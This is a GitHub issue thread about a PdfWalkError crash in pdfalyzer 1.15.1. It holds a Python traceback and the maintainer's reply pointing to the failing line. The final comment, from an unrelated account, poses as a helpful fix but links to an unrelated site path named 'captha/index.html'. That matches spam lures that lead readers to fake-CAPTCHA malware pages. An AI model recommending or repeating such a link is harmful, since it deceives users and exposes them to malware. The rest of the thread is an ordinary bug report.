### ISSUE TITLE
PdfWalkError(f"Cannot set {parent} as parent of {self}, parent is already {self.parent}")

### ISSUE THREAD

**Issue by macdeport** [michelcrypt4d4mus/pdfalyzer#18]
When analyzing this PDF in `version 1.15.1` I encounter the following exception:

[PdfWalkError-240930.pdf.zip](https://github.com/user-attachments/files/17194218/PdfWalkError-240930.pdf.zip)

```python
Traceback (most recent call last):
  File "/Users/alain/Library/Python/3.11/bin/pdfalyze", line 8, in <module>
    sys.exit(pdfalyze())
             ^^^^^^^^^^
  File "/Users/alain/Library/Python/3.11/lib/python/site-packages/pdfalyzer/__init__.py", line 43, in pdfalyze
    pdfalyzer = Pdfalyzer(args.file_to_scan_path)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/alain/Library/Python/3.11/lib/python/site-packages/pdfalyzer/pdfalyzer.py", line 57, in __init__
    self.walk_node(self.pdf_tree)
  File "/Users/alain/Library/Python/3.11/lib/python/site-packages/pdfalyzer/pdfalyzer.py", line 82, in walk_node
    self.walk_node(next_node)
  File "/Users/alain/Library/Python/3.11/lib/python/site-packages/pdfalyzer/pdfalyzer.py", line 82, in walk_node
    self.walk_node(next_node)
  File "/Users/alain/Library/Python/3.11/lib/python/site-packages/pdfalyzer/pdfalyzer.py", line 82, in walk_node
    self.walk_node(next_node)
  [Previous line repeated 7 more times]
  File "/Users/alain/Library/Python/3.11/lib/python/site-packages/pdfalyzer/pdfalyzer.py", line 77, in walk_node
    nodes_to_walk_next = [self._add_relationship_to_pdf_tree(r) for r in node.references_to_other_nodes()]
                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/alain/Library/Python/3.11/lib/python/site-packages/pdfalyzer/pdfalyzer.py", line 77, in <listcomp>
    nodes_to_walk_next = [self._add_relationship_to_pdf_tree(r) for r in node.references_to_other_nodes()]
                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/alain/Library/Python/3.11/lib/python/site-packages/pdfalyzer/pdfalyzer.py", line 133, in _add_relationship_to_pdf_tree
    from_node.set_parent(to_node)
  File "/Users/alain/Library/Python/3.11/lib/python/site-packages/pdfalyzer/decorators/pdf_tree_node.py", line 70, in set_parent
    raise PdfWalkError(f"Cannot set {parent} as parent of {self}, parent is already {self.parent}")
pdfalyzer.util.exceptions.PdfWalkError: Cannot set <7:StructElem:FACTURE_SIMM_NOUVEAU_FACO(Dictionary)> as parent of <98:StructElem:001_SIMM_FACTURE_VERSO(Dictionary)>, parent is already <8:K(Array)>


```

**Comment by michelcrypt4d4mus** [comment]
thanks for the bug report. `StructElem` as parent of a `StructElem` may be a data structure i've never encountered before. not sure i'll be able to fix this in the near future but if you want to take a look it's failing [here](https://github.com/michelcrypt4d4mus/pdfalyzer/blob/6f005834f8ce931b1dfae129aaaf30aac78a0121/pdfalyzer/pdfalyzer.py#L133).

**Comment by Malove98** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.
